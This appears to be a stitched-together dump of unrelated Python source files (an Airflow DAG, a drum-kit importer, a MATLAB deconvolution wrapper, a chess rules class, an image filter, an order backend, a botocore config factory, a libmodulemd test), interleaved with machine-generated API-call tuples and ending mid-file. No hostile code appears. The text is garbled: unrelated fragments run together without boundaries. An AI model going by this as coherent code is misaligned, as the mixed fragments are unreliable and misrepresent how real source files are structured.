] | [((305, 508), 'airflow.DAG', 'DAG', (['"""cbs"""'], {'description': '"""by default imports emails and processes data for (current year - 1). For back-fill do a manual run with following example json: {"load_start_year": 2019}"""'}), '(\'cbs\', **dag_kwargs, description=\n \'by default imports emails and processes data for (current year - 1). For back-fill do a manual run with following example json: {"load_start_year": 2019}\'\n )\n', (308, 508), False, 'from airflow import DAG\n'), ((283, 294), 'airflow.utils.dates.days_ago', 'days_ago', (['(2)'], {}), '(2)\n', (291, 294), False, 'from airflow.utils.dates import days_ago\n'), ((2041, 2138), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs check-data-in-datastore"""'], {'task_id': '"""check-data-in-datastore"""'}), "('anyway-etl cbs check-data-in-datastore', task_id=\n 'check-data-in-datastore')\n", (2056, 2138), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1809, 2014), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs import-to-datastore{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""import-to-datastore"""'}), '(\n \'anyway-etl cbs import-to-datastore{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'import-to-datastore\')\n', (1824, 2014), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1074, 1271), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-accidents{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-accidents"""'}), '(\n \'anyway-etl cbs parse-accidents{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-accidents\')\n', (1089, 1271), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1320, 1515), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-involved{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-involved"""'}), '(\n \'anyway-etl cbs parse-involved{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-involved\')\n', (1335, 1515), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1564, 1759), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-vehicles{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-vehicles"""'}), '(\n \'anyway-etl cbs parse-vehicles{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-vehicles\')\n', (1579, 1759), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n')] |
import cc_dat_utils
#Part 1
input_dat_file = "data/pfgd_test.dat"
#Use cc_dat_utils.make_cc_level_pack_from_dat() to load the file specified by input_dat_file
#print the resulting data
data = cc_dat_utils.make_cc_level_pack_from_dat(input_dat_file)
print(data) | [
"cc_dat_utils.make_cc_level_pack_from_dat"
] | [((195, 251), 'cc_dat_utils.make_cc_level_pack_from_dat', 'cc_dat_utils.make_cc_level_pack_from_dat', (['input_dat_file'], {}), '(input_dat_file)\n', (235, 251), False, 'import cc_dat_utils\n')] |
'''
Created on Jun 14, 2020
@author: peter
'''
import sys
import re
import tarfile
from os import path
import xml.etree.ElementTree as ET
import logging
from gen_drum_kit.importer.importer_base import ImporterBase
from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen
from gen_drum_kit.util import dir_exists
logger = logging.getLogger(__name__)
class ImporterHydrogen(ImporterBase):
""" importer that reads in a Hydrogen drum kit DB """
def __init__(self, params):
super().__init__(params)
logger.debug("Running in debug mode ...")
logger.debug("ImporterBase '%s' created.", __name__)
self._xml = None # assigned later
def importData(self):
self._prepare()
# Load drumkit info from XML file and create a drumkit object
logger.info("Loading Hydrogen XML file '%s'...", self._params.HG_xml)
self._xml = self._read_xml(self._params.HG_xml)
self._debug_print() # only in debug mode
self._read_map_file()
# private functions ----------------------
def _createBuilder(self):
# create and return the builder
logger.info("Creating drum kit from Hydrogen data.")
return(Builder_Hydrogen(params=self._params, xml=self._xml, mapDB=self._channel_map))
def _read_xml(self, HG_xml):
try:
tree = ET.parse(HG_xml)
except:
logger.error("Error reading XML from '%s'! Aborting ...", HG_xml)
sys.exit(2)
logger.info("XML file '%s' successfully read", HG_xml)
self._xml_remove_namespace(tree)
return(tree)
@staticmethod
def _xml_remove_namespace(tree):
root = tree.getroot()
namespaces = re.findall(r"{.*}", root.tag)
try:
namespace = namespaces[0]
logger.debug(namespace)
except:
return() # nothing to be done
nsl = len(namespace)
for elem in root.getiterator():
if elem.tag.startswith(namespace):
elem.tag = elem.tag[nsl:]
return()
def _debug_print(self):
#ET.dump(self._xml)
root = self._xml.getroot()
logger.debug("XML Root is: '%s'", root)
for n1 in root:
logger.debug("\t%s - %s", n1.tag, n1.text)
for n2 in n1:
logger.debug("\t\t%s - %s", n2.tag, n2.text)
for n3 in n2:
logger.debug("\t\t\t%s - %s", n3.tag, n3.text)
for n4 in n3:
logger.debug("\t\t\t\t%s - %s", n4.tag, n4.text)
for n5 in n4:
logger.debug("\t\t\t\t\t%s - %s", n5.tag, n5.text)
def _prepare(self):
if self._params.HG_db:
self._extract_HG_db()
def _extract_HG_db(self):
if not path.exists(self._params.HG_db):
logger.warning("Hydrogen DB '%s' does not exists. Aborting ...", self._params.HG_db )
logger.info("Try on unpacked kit (Hydrogen XML)!")
sys.exit(1)
# if kit name is not set use base name of HG DB file
if not self._params.drumkit_name:
self._params.drumkit_name = path.basename(self._params.HG_db).replace(".h2drumkit", "")
self._params.src_dir = self._params.tmp_dir + "/" + self._params.drumkit_name
self._params.HG_xml = self._params.src_dir + "/drumkit.xml"
# unpack hydrogen file
logger.info("Unpacking Hydrogen data file '%s' to '%s' ...", self._params.HG_db,
self._params.tmp_dir)
try: # open archive, could be gzipped tar or plain tar
logger.debug("Assume it it is gzip'ed tar archive ...")
tar = tarfile.open(self._params.HG_db, "r:gz")
except:
logger.debug("Failed: Assume it is old style tar'ed archive ...")
try:
tar = tarfile.open(self._params.HG_db, "r")
except:
logger.error("Failed to open Hydrogen data file. Aborting ...")
sys.exit(1)
try: # extract
logger.debug("Extracting ...")
tar.extractall(self._params.tmp_dir)
tar.close()
except:
logger.error("Failed to unpack Hydrogen data file. Aborting ...")
sys.exit(1)
# check if name from Hydrogen DB file matches unpacked directory name
if not dir_exists(self._params.src_dir):
logger.error("Name of drum kit '%s' seems to be incorrect! " +
"Please check the unpacked data in directory '%s'. Aborting ..." ,
self._params.drumkit_name, self._params.tmp_dir)
sys.exit(1)
self._params.clean_rm.append(self._params.src_dir)
| [
"logging.getLogger",
"os.path.exists",
"tarfile.open",
"xml.etree.ElementTree.parse",
"gen_drum_kit.builder.builder_hydrogen.Builder_Hydrogen",
"gen_drum_kit.util.dir_exists",
"os.path.basename",
"sys.exit",
"re.findall"
] | [((359, 386), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (376, 386), False, 'import logging\n'), ((1233, 1310), 'gen_drum_kit.builder.builder_hydrogen.Builder_Hydrogen', 'Builder_Hydrogen', ([], {'params': 'self._params', 'xml': 'self._xml', 'mapDB': 'self._channel_map'}), '(params=self._params, xml=self._xml, mapDB=self._channel_map)\n', (1249, 1310), False, 'from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen\n'), ((1747, 1775), 're.findall', 're.findall', (['"""{.*}"""', 'root.tag'], {}), "('{.*}', root.tag)\n", (1757, 1775), False, 'import re\n'), ((1378, 1394), 'xml.etree.ElementTree.parse', 'ET.parse', (['HG_xml'], {}), '(HG_xml)\n', (1386, 1394), True, 'import xml.etree.ElementTree as ET\n'), ((2863, 2894), 'os.path.exists', 'path.exists', (['self._params.HG_db'], {}), '(self._params.HG_db)\n', (2874, 2894), False, 'from os import path\n'), ((3069, 3080), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3077, 3080), False, 'import sys\n'), ((3756, 3796), 'tarfile.open', 'tarfile.open', (['self._params.HG_db', '"""r:gz"""'], {}), "(self._params.HG_db, 'r:gz')\n", (3768, 3796), False, 'import tarfile\n'), ((4450, 4482), 'gen_drum_kit.util.dir_exists', 'dir_exists', (['self._params.src_dir'], {}), '(self._params.src_dir)\n', (4460, 4482), False, 'from gen_drum_kit.util import dir_exists\n'), ((4737, 4748), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4745, 4748), False, 'import sys\n'), ((1501, 1512), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1509, 1512), False, 'import sys\n'), ((4344, 4355), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4352, 4355), False, 'import sys\n'), ((3225, 3258), 'os.path.basename', 'path.basename', (['self._params.HG_db'], {}), '(self._params.HG_db)\n', (3238, 3258), False, 'from os import path\n'), ((3930, 3967), 'tarfile.open', 'tarfile.open', (['self._params.HG_db', '"""r"""'], {}), "(self._params.HG_db, 'r')\n", (3942, 3967), False, 'import tarfile\n'), ((4084, 4095), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4092, 4095), False, 'import sys\n')] |
import matlab.engine
import matlab
import numpy as np
import PIL
import matplotlib.pyplot as plt
import sys
print(sys.version_info[0:2])
if sys.version_info[0:2] != (3, 8) and sys.version_info[0:2] != (3, 7) and sys.version_info[0:2] != (3, 6):
raise Exception('Requires python 3.6, 3.7, or 3.8')
eng = matlab.engine.start_matlab()
def blind_deconvolution(image, kernel_size=3, num_iterations=30, weighted=False, edge_weight=.08):
# If URL to image
if type(image) == type(str()):
image = PIL.Image.open(image)
image = PIL.ImageOps.grayscale(image)
# If PIL image object
elif type(image) == PIL.Image:
image = np.asarray(image)
image = PIL.ImageOps.grayscale(image)
# If its already in numpy array
elif type(image) == np.ndarray:
image = PIL.Image.fromarray(image)
image = PIL.ImageOps.grayscale(image)
# Else raise exception
else:
raise Exception('Input was of type ' + str(type(image)) + '. Must be a URL to an image, a PIL Image object, or an np array')
# If weighted
if weighted:
weight = eng.edge(image,"sobel",edge_weight)
se = eng.strel("disk",2)
weight = 1-matlab.double(eng.imdilate(weight,se))
# Starting kernel
start_kernel_np = np.ones((kernel_size,kernel_size))
start_kernel = []
image_np = np.asarray(image)
image = []
# Convert to matlab types
for i in range(len(start_kernel_np)):
start_kernel.append(matlab.double(start_kernel_np[i].tolist()))
start_kernel = matlab.double(start_kernel)
for i in range(len(image_np)):
image.append(matlab.double(image_np[i].tolist()))
image = matlab.double(image)
# Call Matlab Blind deconvolution
if weighted:
deconvolved = eng.deconvblind(image, start_kernel, num_iterations, weight)
else:
deconvolved = eng.deconvblind(image, start_kernel)
deconvolved = np.asarray(deconvolved).squeeze()
return deconvolved | [
"PIL.Image.fromarray",
"PIL.Image.open",
"matlab.engine.start_matlab",
"numpy.ones",
"numpy.asarray",
"PIL.ImageOps.grayscale",
"matlab.double"
] | [((310, 338), 'matlab.engine.start_matlab', 'matlab.engine.start_matlab', ([], {}), '()\n', (336, 338), False, 'import matlab\n'), ((1282, 1317), 'numpy.ones', 'np.ones', (['(kernel_size, kernel_size)'], {}), '((kernel_size, kernel_size))\n', (1289, 1317), True, 'import numpy as np\n'), ((1354, 1371), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1364, 1371), True, 'import numpy as np\n'), ((1554, 1581), 'matlab.double', 'matlab.double', (['start_kernel'], {}), '(start_kernel)\n', (1567, 1581), False, 'import matlab\n'), ((1697, 1717), 'matlab.double', 'matlab.double', (['image'], {}), '(image)\n', (1710, 1717), False, 'import matlab\n'), ((512, 533), 'PIL.Image.open', 'PIL.Image.open', (['image'], {}), '(image)\n', (526, 533), False, 'import PIL\n'), ((550, 579), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), '(image)\n', (572, 579), False, 'import PIL\n'), ((657, 674), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (667, 674), True, 'import numpy as np\n'), ((691, 720), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), '(image)\n', (713, 720), False, 'import PIL\n'), ((1944, 1967), 'numpy.asarray', 'np.asarray', (['deconvolved'], {}), '(deconvolved)\n', (1954, 1967), True, 'import numpy as np\n'), ((809, 835), 'PIL.Image.fromarray', 'PIL.Image.fromarray', (['image'], {}), '(image)\n', (828, 835), False, 'import PIL\n'), ((852, 881), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), '(image)\n', (874, 881), False, 'import PIL\n')] |
from collections import defaultdict
import pieces
class RulesEnforcer(object):
"""
Enforces the rules of the game
Examines the move, and determines whether its a valid move or not.
"""
letter_dict = {'a':0,'b':1,'c':2,'d':3,'e':4,'f':5,'g':6,'h':7}
pos_letters = letter_dict.keys()
pos_nums = [1,2,3,4,5,6,7,8]
letter_dict_rev = dict((v,k) for k,v in letter_dict.iteritems())
possible_pieces = ['p','r','n','b','q','k']
def __init__(self):
pass
@staticmethod
def check_square(chessboard, coordinate):
"""
Takes as input a chess board and coordinate and outputs
what is inside that space
This is useful for a variable of purposes
"""
mycord = RulesEnforcer.coordinate_mapper(coordinate)
first = mycord[0]
second = mycord[1]
return chessboard[first][second]
@staticmethod
def possible_moves(chessboard, color, piece, coordinate):
"""return possible moves of a piece
a number of things need to be taken into a count
1. whether we are allowed to move the piece
input: piece, color, and coordinate of piece
output: all possible moves of the piece (lists of lists)
Example of a cooridinate: a2
"""
#if the coordinate is an array
if type(coordinate) == list:
coordinate = RulesEnforcer.coordinate_mapper_reverse(coordinate)
#break out coordinate into a list of len(2)
cords = list(coordinate)
cords[1] = int(cords[1])
#pawns
if piece == 'p':
pos_moves = pieces.Pawn.moves(cords, color, chessboard)
#rook
elif piece == 'r':
pos_moves = pieces.Rook.moves(cords, color, chessboard)
#knight
elif piece == 'n':
pos_moves = pieces.Knight.moves(cords, color, chessboard)
#bishop
elif piece == 'b':
pos_moves = pieces.Bishop.moves(cords, color, chessboard)
#queen
elif piece == "q":
pos_moves = pieces.Queen.moves(cords, color, chessboard)
#king
elif piece == "k":
pos_moves = pieces.King.moves(cords, color, chessboard)
else:
return "invalid inputs!"
return pos_moves
@staticmethod
def all_possible_moves(chessboard, color):
"""takes as input a chessboard and generates all possible moves
input:
color: color that you want to generate moves for, 'w' or 'b'
chessboard: 8x8 chessboard
output: dict of all possible moves
key: piece and position
value: list of list of possible moves
"""
#dict for storing all the moves
all_moves = defaultdict()
for cor1, row in enumerate(chessboard):
for cor2, square in enumerate(row):
if square.split('-')[0] == color:
piece = square.split('-')[1]
coordinate = [cor1, cor2]
moves = RulesEnforcer.possible_moves(chessboard, color, piece, coordinate)
if moves:
all_moves[RulesEnforcer.coordinate_mapper_reverse(coordinate)] = moves
return all_moves
@staticmethod
def remove_outofbound_moves(pos_moves):
"""remove moves that are out of range of the board
input: list of list of moves
output: list of list of moves, with out of bound moves removed
"""
to_remove = []
for i in range(len(pos_moves)):
if pos_moves[i][0] not in RulesEnforcer.pos_letters or pos_moves[i][1] not in RulesEnforcer.pos_nums:
to_remove.append(pos_moves[i])
for i in to_remove:
pos_moves.remove(i)
return pos_moves
@staticmethod
def collision_detection(move, color, chessboard):
"""
Collision detection for the chess game.
input:
move: the move i.e ['a',7]
color: white ('w') or black ('b')
chessboard: chessboard object
output: "friend" or "enemy" depending on what color you are and what the enemy color is
"""
try:
move = RulesEnforcer.coordinate_mapper(move)
except:
return False
x = move[0]
y = move[1]
try:
piece = chessboard[x][y]
except:
return False
if color == 'w' and piece.split('-')[0] == 'w':
return "friend"
elif color == 'b' and piece.split('-')[0] == 'b':
return "friend"
if color == 'w' and piece.split('-')[0] == 'b':
return "enemy"
elif color == 'b' and piece.split('-')[0] == 'w':
return "enemy"
else:
return "empty"
@staticmethod
def move_allowed(move, chessboard):
"""
Determine if the move is allowed
input:
move: the move
chessboard: chessboard object
output: boolean, whether the move is allowed or not
"""
pass
@staticmethod
def coordinate_mapper(mycoordinate):
"""takes as input a chess coordinate and maps it to the coordinate in the array
input: chess coordinate (ie a5)
output: coordinate of the array to be used in the chessboard
for example: [0,2]
"""
mycoordinate = list(mycoordinate)
starthor = RulesEnforcer.letter_dict[mycoordinate[0]]
startver = 7 - (int(mycoordinate[1]) - 1)
return [startver, starthor]
@staticmethod
def coordinate_mapper_reverse(myarray):
"""
Does the opposite of coordinate_mapper(). Takes as input array coordinates (ie. [0,5])
This method is useful if you
input: a length 2 list of array coordinates
output: chess coordinate (str)
example:
[7,0] -> a1
"""
#letter of cor
first_cor = RulesEnforcer.letter_dict_rev[myarray[1]]
#number of cor
second_cor = 8 - myarray[0]
return str(first_cor) + str(second_cor)
@staticmethod
def legal_move_checker(start, finish):
"""checks if a move is legal or not based on the type of piece"""
pass | [
"pieces.Bishop.moves",
"pieces.Knight.moves",
"pieces.Pawn.moves",
"pieces.King.moves",
"collections.defaultdict",
"pieces.Queen.moves",
"pieces.Rook.moves"
] | [((2898, 2911), 'collections.defaultdict', 'defaultdict', ([], {}), '()\n', (2909, 2911), False, 'from collections import defaultdict\n'), ((1670, 1713), 'pieces.Pawn.moves', 'pieces.Pawn.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1687, 1713), False, 'import pieces\n'), ((1782, 1825), 'pieces.Rook.moves', 'pieces.Rook.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1799, 1825), False, 'import pieces\n'), ((1902, 1947), 'pieces.Knight.moves', 'pieces.Knight.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (1921, 1947), False, 'import pieces\n'), ((2024, 2069), 'pieces.Bishop.moves', 'pieces.Bishop.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2043, 2069), False, 'import pieces\n'), ((2145, 2189), 'pieces.Queen.moves', 'pieces.Queen.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2163, 2189), False, 'import pieces\n'), ((2264, 2307), 'pieces.King.moves', 'pieces.King.moves', (['cords', 'color', 'chessboard'], {}), '(cords, color, chessboard)\n', (2281, 2307), False, 'import pieces\n')] |
from skimage.util import img_as_float
from skimage import io, filters
# from skimage.viewer import ImageViewer
import numpy as np
def split_image_into_channels(image):
"""Look at each image separately"""
red_channel = image[:, :, 0]
green_channel = image[:, :, 1]
blue_channel = image[:, :, 2]
return red_channel, green_channel, blue_channel
def merge_channels(red, green, blue):
"""Merge channels back into an image"""
return np.stack([red, green, blue], axis=2)
def sharpen(image, a, b):
"""Sharpening an image: Blur and then subtract from original"""
blurred = filters.gaussian(image, sigma=10, multichannel=True)
sharper = np.clip(image * a - blurred * b, 0, 1.0)
return sharper
def channel_adjust(channel, values):
# preserve the original size, so we can reconstruct at the end
orig_size = channel.shape
# flatten the image into a single array
flat_channel = channel.flatten()
# this magical numpy function takes the values in flat_channel
# and maps it from its range in [0, 1] to its new squeezed and
# stretched range
adjusted = np.interp(flat_channel, np.linspace(0, 1, len(values)), values)
# put back into the original image shape
return adjusted.reshape(orig_size)
def gotham(
original_image,
r_boost_upper=1,
b_adjusted_upper=1,
blurriness=1.3,
subtraction=0.3,
amount_bluer_blacks=0.03,
):
original_image = img_as_float(original_image)
r, g, b = split_image_into_channels(original_image)
# np.linspace second argument
r_boost_lower = channel_adjust(r, np.linspace(0, r_boost_upper))
# amount of bluer_blacks
bluer_blacks = merge_channels(
r_boost_lower, g, np.clip(b + amount_bluer_blacks, 0, 1.0)
)
# amount blurriness, and subtraction
sharper = sharpen(bluer_blacks, blurriness, subtraction)
r, g, b = split_image_into_channels(sharper)
# np.linspace second argument
b_adjusted = channel_adjust(b, np.linspace(0, b_adjusted_upper))
return merge_channels(r, g, b_adjusted)
if __name__ == "__main__":
original_image = io.imread("data/input/sample.jpg")
output = gotham(original_image, b_adjusted_upper=3)
io.imsave("data/output/image-experiment/gotham.jpg", output)
| [
"numpy.clip",
"skimage.util.img_as_float",
"numpy.stack",
"skimage.io.imread",
"numpy.linspace",
"skimage.io.imsave",
"skimage.filters.gaussian"
] | [((460, 496), 'numpy.stack', 'np.stack', (['[red, green, blue]'], {'axis': '(2)'}), '([red, green, blue], axis=2)\n', (468, 496), True, 'import numpy as np\n'), ((607, 659), 'skimage.filters.gaussian', 'filters.gaussian', (['image'], {'sigma': '(10)', 'multichannel': '(True)'}), '(image, sigma=10, multichannel=True)\n', (623, 659), False, 'from skimage import io, filters\n'), ((674, 714), 'numpy.clip', 'np.clip', (['(image * a - blurred * b)', '(0)', '(1.0)'], {}), '(image * a - blurred * b, 0, 1.0)\n', (681, 714), True, 'import numpy as np\n'), ((1446, 1474), 'skimage.util.img_as_float', 'img_as_float', (['original_image'], {}), '(original_image)\n', (1458, 1474), False, 'from skimage.util import img_as_float\n'), ((2124, 2158), 'skimage.io.imread', 'io.imread', (['"""data/input/sample.jpg"""'], {}), "('data/input/sample.jpg')\n", (2133, 2158), False, 'from skimage import io, filters\n'), ((2219, 2279), 'skimage.io.imsave', 'io.imsave', (['"""data/output/image-experiment/gotham.jpg"""', 'output'], {}), "('data/output/image-experiment/gotham.jpg', output)\n", (2228, 2279), False, 'from skimage import io, filters\n'), ((1605, 1634), 'numpy.linspace', 'np.linspace', (['(0)', 'r_boost_upper'], {}), '(0, r_boost_upper)\n', (1616, 1634), True, 'import numpy as np\n'), ((1727, 1767), 'numpy.clip', 'np.clip', (['(b + amount_bluer_blacks)', '(0)', '(1.0)'], {}), '(b + amount_bluer_blacks, 0, 1.0)\n', (1734, 1767), True, 'import numpy as np\n'), ((1996, 2028), 'numpy.linspace', 'np.linspace', (['(0)', 'b_adjusted_upper'], {}), '(0, b_adjusted_upper)\n', (2007, 2028), True, 'import numpy as np\n')] |
from datetime import datetime
from backend.backend.classes_main import Order, OrderItemStateUpdate, OrderUpdate, StatusHistory
from backend.backend.exceptions import NoOrderFoundException
from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order
from backend.backend.delivery_integration import update_delivery_provider
from backend.backend.schemas import OrderSchema
async def fetch_orders():
orders = await get_orders()
return orders
async def create_new_order(order_dict: OrderSchema):
id = await create_order(order_dict)
return id
async def create_new_status_history(new_state: str):
status_history = StatusHistory(
response = '',
source = 1, # 1 is restaurant
status = new_state,
timeStamp = str(datetime.now()),
)
return status_history
async def update_order_state(update_data: OrderUpdate, existing_order: Order):
existing_order.status = update_data.new_order_state
status_history = await create_new_status_history(update_data.new_order_state)
existing_order.status_history.append(status_history)
await update_order_status(existing_order)
async def update_state(order_id: str, update_data: OrderUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_order_state(update_data, existing_order)
# When order status is updated we update the delivery provider
update_delivery_provider()
async def update_item_state(order_id: str, update_data: OrderItemStateUpdate):
existing_order = await get_order_by_id(order_id)
if not existing_order:
raise NoOrderFoundException(f'Order by id {order_id} not found')
await update_item_list(update_data, existing_order)
async def update_item_list(update_data: OrderItemStateUpdate, existing_order: Order):
for item in existing_order.items:
if item.name == update_data.item_name:
item.status = update_data.new_state
await update_items(existing_order)
| [
"backend.backend.repository.update_order_status",
"backend.backend.repository.get_orders",
"backend.backend.delivery_integration.update_delivery_provider",
"backend.backend.repository.get_order_by_id",
"backend.backend.repository.update_items",
"backend.backend.exceptions.NoOrderFoundException",
"dateti... | [((1540, 1566), 'backend.backend.delivery_integration.update_delivery_provider', 'update_delivery_provider', ([], {}), '()\n', (1564, 1566), False, 'from backend.backend.delivery_integration import update_delivery_provider\n'), ((473, 485), 'backend.backend.repository.get_orders', 'get_orders', ([], {}), '()\n', (483, 485), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((573, 597), 'backend.backend.repository.create_order', 'create_order', (['order_dict'], {}), '(order_dict)\n', (585, 597), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1150, 1185), 'backend.backend.repository.update_order_status', 'update_order_status', (['existing_order'], {}), '(existing_order)\n', (1169, 1185), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1279, 1304), 'backend.backend.repository.get_order_by_id', 'get_order_by_id', (['order_id'], {}), '(order_id)\n', (1294, 1304), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1347, 1405), 'backend.backend.exceptions.NoOrderFoundException', 'NoOrderFoundException', (['f"""Order by id {order_id} not found"""'], {}), "(f'Order by id {order_id} not found')\n", (1368, 1405), False, 'from backend.backend.exceptions import NoOrderFoundException\n'), ((1674, 1699), 'backend.backend.repository.get_order_by_id', 'get_order_by_id', (['order_id'], {}), '(order_id)\n', (1689, 1699), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((1742, 1800), 'backend.backend.exceptions.NoOrderFoundException', 'NoOrderFoundException', (['f"""Order by id {order_id} not found"""'], {}), "(f'Order by id {order_id} not found')\n", (1763, 1800), False, 'from backend.backend.exceptions import NoOrderFoundException\n'), ((2087, 2115), 'backend.backend.repository.update_items', 'update_items', (['existing_order'], {}), '(existing_order)\n', (2099, 2115), False, 'from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order\n'), ((816, 830), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (828, 830), False, 'from datetime import datetime\n')] |
from botocore.configprovider import os, SmartDefaultsConfigStoreFactory
class AioSmartDefaultsConfigStoreFactory(SmartDefaultsConfigStoreFactory):
async def merge_smart_defaults(self, config_store, mode, region_name):
if mode == 'auto':
mode = await self.resolve_auto_mode(region_name)
default_configs = self._default_config_resolver.get_default_config_values(
mode)
for config_var in default_configs:
config_value = default_configs[config_var]
method = getattr(self, f'_set_{config_var}', None)
if method:
method(config_store, config_value)
async def resolve_auto_mode(self, region_name):
current_region = None
if os.environ.get('AWS_EXECUTION_ENV'):
default_region = os.environ.get('AWS_DEFAULT_REGION')
current_region = os.environ.get('AWS_REGION', default_region)
if not current_region:
if self._instance_metadata_region:
current_region = self._instance_metadata_region
else:
try:
current_region = \
await self._imds_region_provider.provide()
self._instance_metadata_region = current_region
except Exception:
pass
if current_region:
if region_name == current_region:
return 'in-region'
else:
return 'cross-region'
return 'standard'
| [
"botocore.configprovider.os.environ.get"
] | [((742, 777), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_EXECUTION_ENV"""'], {}), "('AWS_EXECUTION_ENV')\n", (756, 777), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n'), ((808, 844), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_DEFAULT_REGION"""'], {}), "('AWS_DEFAULT_REGION')\n", (822, 844), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n'), ((874, 918), 'botocore.configprovider.os.environ.get', 'os.environ.get', (['"""AWS_REGION"""', 'default_region'], {}), "('AWS_REGION', default_region)\n", (888, 918), False, 'from botocore.configprovider import os, SmartDefaultsConfigStoreFactory\n')] |
#!/usr/bin/python3
# This file is part of libmodulemd
# Copyright (C) 2017-2018 <NAME>
#
# Fedora-License-Identifier: MIT
# SPDX-2.0-License-Identifier: MIT
# SPDX-3.0-License-Identifier: MIT
#
# This program is free software.
# For more information on the license, see COPYING.
# For more information on free software, see
# <https://www.gnu.org/philosophy/free-sw.en.html>.
from os import path
import sys
try:
import unittest
import gi
gi.require_version("Modulemd", "2.0")
from gi.repository import Modulemd
from gi.repository.Modulemd import ModuleIndex
from gi.repository import GLib
except ImportError:
# Return error 77 to skip this test on platforms without the necessary
# python modules
sys.exit(77)
from base import TestBase
class TestModule(TestBase):
def test_search_streams(self):
idx = Modulemd.ModuleIndex.new()
idx.update_from_file(path.join(self.test_data_path, "f29.yaml"), True)
module = idx.get_module("nodejs")
self.assertEqual(len(module.search_streams("8", 0)), 1)
self.assertEqual(len(module.search_streams("10", 0)), 1)
def test_copy_with_obsoletes(self):
idx = Modulemd.ModuleIndex.new()
e = Modulemd.Obsoletes.new(1, 2, "testmodule", "teststream", "testmsg")
e.set_obsoleted_by("module_obsoleter", "stream_obsoleter")
idx.add_obsoletes(e)
m = idx.get_module("testmodule")
assert m
assert m.get_module_name() == "testmodule"
obsoletes_from_orig = m.get_newest_active_obsoletes("teststream", None)
assert (
obsoletes_from_orig.get_obsoleted_by_module_name()
== "module_obsoleter"
)
m_copy = m.copy()
assert m_copy.get_module_name() == "testmodule"
obsoletes_from_copy = m_copy.get_newest_active_obsoletes(
"teststream", None
)
assert (
obsoletes_from_copy.get_obsoleted_by_module_name()
== "module_obsoleter"
)
def test_adding_obsoletes_is_order_independent(self):
obsoletes_without_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
context: deadbeef
modified: 2019-07-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 12
...
"""
obsoletes_with_context = """
---
document: modulemd-obsoletes
version: 1
data:
module: nodejs
stream: 10
modified: 2019-09-27T00:00Z
message: test message
obsoleted_by:
module: nodejs
stream: 14
...
"""
for ordered_yaml in [
obsoletes_without_context + obsoletes_with_context,
